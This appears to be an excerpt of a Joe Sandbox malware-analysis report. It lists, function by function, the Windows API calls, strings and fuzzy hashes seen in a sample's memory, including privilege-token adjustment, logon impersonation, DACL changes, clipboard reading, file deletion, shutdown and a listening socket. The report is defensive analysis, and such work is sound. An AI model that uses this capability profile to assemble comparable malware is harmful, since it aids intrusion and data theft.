AttachThreadInput.USER32(?,000000FF,00000000), ref: 0023F557

Strings

Shell_TrayWnd, xrefs: 0023F46F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 069ee3d841ef615de66cb4ff409a2d439691f4bfb885588e55eb03424da74674
Instruction ID: 15a26d74cb79bc74ec26e50af471c95b7cf9aed8e772cc69db92abfc7e015830
Opcode Fuzzy Hash: 069ee3d841ef615de66cb4ff409a2d439691f4bfb885588e55eb03424da74674
Instruction Fuzzy Hash: AD3153B1E502187BEB206FB56D4AFBF7E6CEB44B50F200069F604F61D1C6B15D50AA60

Function 00241201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
Part of subcall function 002416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
Part of subcall function 002416C3: GetLastError.KERNEL32 ref: 0024174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00241286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002412A8
CloseHandle.KERNEL32(?), ref: 002412B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002412D1
GetProcessWindowStation.USER32 ref: 002412EA
SetProcessWindowStation.USER32(00000000), ref: 002412F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00241310

Part of subcall function 002410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002411FC), ref: 002410D4
Part of subcall function 002410BF: CloseHandle.KERNEL32(?,?,002411FC), ref: 002410E9

Strings

default, xrefs: 0024130B
Z*, xrefs: 00241392
, xrefs: 0024125A
winsta0, xrefs: 002412CC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z*
API String ID: 22674027-678551114
Opcode ID: d9ae1b8bf81a20733b6933021c211967924cb4f6a7340e2d1f206f68c03627dc
Instruction ID: c26a8ed2b6318a4357a17df5c85cbbf253b6be2300f0afd663b78349fb41b41f
Opcode Fuzzy Hash: d9ae1b8bf81a20733b6933021c211967924cb4f6a7340e2d1f206f68c03627dc
Instruction Fuzzy Hash: 4E81AD7191020AAFDF299FA4DC49FEE7BB9EF04704F144129FA14B61A1D77099A4CF60

Function 00240B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
Part of subcall function 002410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
Part of subcall function 002410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
Part of subcall function 002410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00240BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00240C00
GetLengthSid.ADVAPI32(?), ref: 00240C17
GetAce.ADVAPI32(?,00000000,?), ref: 00240C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00240C6D
GetLengthSid.ADVAPI32(?), ref: 00240C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00240C8C
HeapAlloc.KERNEL32(00000000), ref: 00240C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00240CB4
CopySid.ADVAPI32(00000000), ref: 00240CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00240CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00240D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00240D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D45
HeapFree.KERNEL32(00000000), ref: 00240D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D55
HeapFree.KERNEL32(00000000), ref: 00240D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D65
HeapFree.KERNEL32(00000000), ref: 00240D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00240D78
HeapFree.KERNEL32(00000000), ref: 00240D7F

Part of subcall function 00241193: GetProcessHeap.KERNEL32(00000008,00240BB1,?,00000000,?,00240BB1,?), ref: 002411A1
Part of subcall function 00241193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00240BB1,?), ref: 002411A8
Part of subcall function 00241193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00240BB1,?), ref: 002411B7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 4dcc46065b84e416346a964bbbfddcc72205ecb96de3451d1b214cd112581d0e
Instruction ID: a18793054a63682b7a84ce92746c4de701ea01cd9d90990b371f1f3277709c97
Opcode Fuzzy Hash: 4dcc46065b84e416346a964bbbfddcc72205ecb96de3451d1b214cd112581d0e
Instruction Fuzzy Hash: ED71607191020AEBDF14DFE4DC88FAEBBB8FF04310F144529EA19A6151D771A995CBA0

Function 0025EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0027CC08), ref: 0025EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0025EB37
GetClipboardData.USER32(0000000D), ref: 0025EB43
CloseClipboard.USER32 ref: 0025EB4F
GlobalLock.KERNEL32(00000000), ref: 0025EB87
CloseClipboard.USER32 ref: 0025EB91
GlobalUnlock.KERNEL32(00000000), ref: 0025EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0025EBC9
GetClipboardData.USER32(00000001), ref: 0025EBD1
GlobalLock.KERNEL32(00000000), ref: 0025EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0025EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0025EC38
GetClipboardData.USER32(0000000F), ref: 0025EC44
GlobalLock.KERNEL32(00000000), ref: 0025EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0025EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0025EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0025ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0025ECF3
CountClipboardFormats.USER32 ref: 0025ED14
CloseClipboard.USER32 ref: 0025ED59

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 05b5cb1464ce9265ae9486af442bc36997b181a149d01824eca8e0e032dab549
Instruction ID: e5362aedd431de337520045f7f0db9a0926884ece5307395f92e892be9b05c34
Opcode Fuzzy Hash: 05b5cb1464ce9265ae9486af442bc36997b181a149d01824eca8e0e032dab549
Instruction Fuzzy Hash: C06104702143029FD704EF31D888F2A77A8BF94705F25451DF85A872A2CB70DE49CB66

Function 0025698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002569BE
FindClose.KERNEL32(00000000), ref: 00256A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00256A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00256A75

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00256AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00256ADF

Strings

%03d, xrefs: 00256DA2
%4d, xrefs: 00256BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00256B32
%4d%02d%02d%02d%02d%02d, xrefs: 00256B6A
%02d, xrefs: 00256C00, 00256C0A, 00256C5A, 00256CAA, 00256CFA, 00256D4A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: b475fee7dfd05a95710fb35fab5e9460abcd6139febd03837a6fed89be9174b0
Instruction ID: caa794245eb28771b72fe07dd9c1e3226b72596a72e5b6b5e8df44779529a35f
Opcode Fuzzy Hash: b475fee7dfd05a95710fb35fab5e9460abcd6139febd03837a6fed89be9174b0
Instruction Fuzzy Hash: B2D16F72508340AEC310EFA5D885EAFB7ECAFA8704F44491DF985D7191EB74DA48CB62

Function 00259642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00259663
GetFileAttributesW.KERNEL32(?), ref: 002596A1
SetFileAttributesW.KERNEL32(?,?), ref: 002596BB
FindNextFileW.KERNEL32(00000000,?), ref: 002596D3
FindClose.KERNEL32(00000000), ref: 002596DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002596FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0025974A
SetCurrentDirectoryW.KERNEL32(002A6B7C), ref: 00259768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00259772
FindClose.KERNEL32(00000000), ref: 0025977F
FindClose.KERNEL32(00000000), ref: 0025978F

Strings

*.*, xrefs: 002596F5

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 2a8af87ef785a06c580c6ceb39a0b38254094dc63a7572fe27a3f743ee04a312
Instruction ID: d46f7430f20c5f13acff53f0eea5439d42f62cd9f18bbf5d6c044eaf3edbd9d3
Opcode Fuzzy Hash: 2a8af87ef785a06c580c6ceb39a0b38254094dc63a7572fe27a3f743ee04a312
Instruction Fuzzy Hash: 2131C77152161AAFDB149FB4EC4CADE77AC9F0A321F24415AFC09E2091DB30D9D88E14

Function 0025979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002597BE
FindNextFileW.KERNEL32(00000000,?), ref: 00259819
FindClose.KERNEL32(00000000), ref: 00259824
FindFirstFileW.KERNEL32(*.*,?), ref: 00259840
SetCurrentDirectoryW.KERNEL32(?), ref: 00259890
SetCurrentDirectoryW.KERNEL32(002A6B7C), ref: 002598AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002598B8
FindClose.KERNEL32(00000000), ref: 002598C5
FindClose.KERNEL32(00000000), ref: 002598D5

Part of subcall function 0024DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0024DB00

Strings

*.*, xrefs: 0025983B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: fdb1a8af2a0b7d08b0ba1d8d1eb792109b20e5685a477a6cf31e34d5a30dd80d
Instruction ID: f8ab53f6390b65520c7b9ee33e1bc0e3f7a461bc71263bb23c4b9f66d54c61ee
Opcode Fuzzy Hash: fdb1a8af2a0b7d08b0ba1d8d1eb792109b20e5685a477a6cf31e34d5a30dd80d
Instruction Fuzzy Hash: E731B23151121AEEDB10AFB4EC4CADE77AC9F06321F24455AEC14A21D1DB30DAE8CF28

Function 00258195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00258257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00258267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00258273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00258310
SetCurrentDirectoryW.KERNEL32(?), ref: 00258324
SetCurrentDirectoryW.KERNEL32(?), ref: 00258356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0025838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00258395

Strings

*.*, xrefs: 0025839B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: fe5cdf67270d0cd60b47bd371dd485800a668fb2f6be01bf53364d09f64e7372
Instruction ID: c570dcc60a98ab044af395c66e363a57e339360edc583f43932faa2daaf090ec
Opcode Fuzzy Hash: fe5cdf67270d0cd60b47bd371dd485800a668fb2f6be01bf53364d09f64e7372
Instruction Fuzzy Hash: 10618872118745AFCB10EF60D8849AEB3E8BF89310F04885EF989D7251DB71E959CB92

Function 0024D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

Part of subcall function 0024E199: GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A

FindFirstFileW.KERNEL32(?,?), ref: 0024D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0024D1DD
MoveFileW.KERNEL32(?,?), ref: 0024D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0024D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0024D237

Part of subcall function 0024D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0024D21C,?,?), ref: 0024D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0024D253
FindClose.KERNEL32(00000000), ref: 0024D264

Strings

\*.*, xrefs: 0024D0CD, 0024D0D6, 0024D0EB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 5de7687c24f47636dc84995db3388ef330f20202aa3a2585a286e99d9cc8a473
Instruction ID: f477a72e96ae9e7dbe8784ba5374955e7d3f8442dd4d5986d6cf2f7cb7b6a692
Opcode Fuzzy Hash: 5de7687c24f47636dc84995db3388ef330f20202aa3a2585a286e99d9cc8a473
Instruction Fuzzy Hash: 61618C3180114DABCF19EFE1DA92DEDB7B5AF65300F604069E806771A2EB706F49CB60

Function 0025ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0025ED91
EmptyClipboard.USER32 ref: 0025ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0025EDAC
CloseClipboard.USER32 ref: 0025EEA3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 19a1029632d8b88d10cacb88b4b1142a9e7390039c23c0276a1c73ce308b240c
Instruction ID: 1061ba49aa0b06e928acafb1b2da9e5870b94e209b418c47c6dedecd68c2ae1e
Opcode Fuzzy Hash: 19a1029632d8b88d10cacb88b4b1142a9e7390039c23c0276a1c73ce308b240c
Instruction Fuzzy Hash: 0741E1702146119FDB14DF25E88DB19BBE4FF44329F15C09DE8298B6A2C731ED81CB80

Function 0024E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
Part of subcall function 002416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
Part of subcall function 002416C3: GetLastError.KERNEL32 ref: 0024174A

ExitWindowsEx.USER32(?,00000000), ref: 0024E932

Strings

, xrefs: 0024E95C
@, xrefs: 0024E925
, xrefs: 0024E920
SeShutdownPrivilege, xrefs: 0024E902

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: ce162a2d859332004db92777ea790f5efcfa9aed9d11810876935eed48b67915
Instruction ID: dc002956119fd6cf14f1d75b1c5dba6d25d57bf9f258fcdcef61315413865461
Opcode Fuzzy Hash: ce162a2d859332004db92777ea790f5efcfa9aed9d11810876935eed48b67915
Instruction Fuzzy Hash: 5001DB73630211ABFF5C26B4AC8ABBF725CB714750F160425FC02E21D2D6A15CA08694

Function 00261204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00261276
WSAGetLastError.WSOCK32 ref: 00261283
bind.WSOCK32(00000000,?,00000010), ref: 002612BA
WSAGetLastError.WSOCK32 ref: 002612C5
closesocket.WSOCK32(00000000), ref: 002612F4
listen.WSOCK32(00000000,00000005), ref: 00261303
WSAGetLastError.WSOCK32 ref: 0026130D
closesocket.WSOCK32(00000000), ref: 0026133C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 99ab0a719d622e6056c6e4f0d22d7fc4c94e27261fff4b11f99c8d2d7bc85e00
Instruction ID: 2cb9563e7fd7018e95377fbcff94e887f3b0a1eda8fc39c32be1d9e5f7b5e1f8
Opcode Fuzzy Hash: 99ab0a719d622e6056c6e4f0d22d7fc4c94e27261fff4b11f99c8d2d7bc85e00
Instruction Fuzzy Hash: CB417D31A001519FD710DF24D498B2ABBE5AF46318F2C818CE8568F296C771ECD1CBE1

Function 0021B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0021B9D4
_free.LIBCMT ref: 0021B9F8
_free.LIBCMT ref: 0021BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00283700), ref: 0021BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002B121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0021BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002B1270,000000FF,?,0000003F,00000000,?), ref: 0021BC36
_free.LIBCMT ref: 0021BD4B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: cb2f7ee2ccf11134c112698249c12c35a3e2ec945608d28acb34dd11bdb1c847
Instruction ID: f813905551a25aa56ba2c17d7df4046bd9843dfdd811ef04218a029d6804b95a
Opcode Fuzzy Hash: cb2f7ee2ccf11134c112698249c12c35a3e2ec945608d28acb34dd11bdb1c847
Instruction Fuzzy Hash: 76C128719242069FCB269F789855AEA7BF8EF61310F24419AE854D7251DB308EF18B90

Function 0021E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0021E645

Strings

1#IND, xrefs: 0021F83D
1#QNAN, xrefs: 0021F84B
1#INF, xrefs: 0021F852
1#SNAN, xrefs: 0021F844

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ffa6c81657eec7b84e05235db7532da9acf232aae951cf49852d270dfd57a1fa
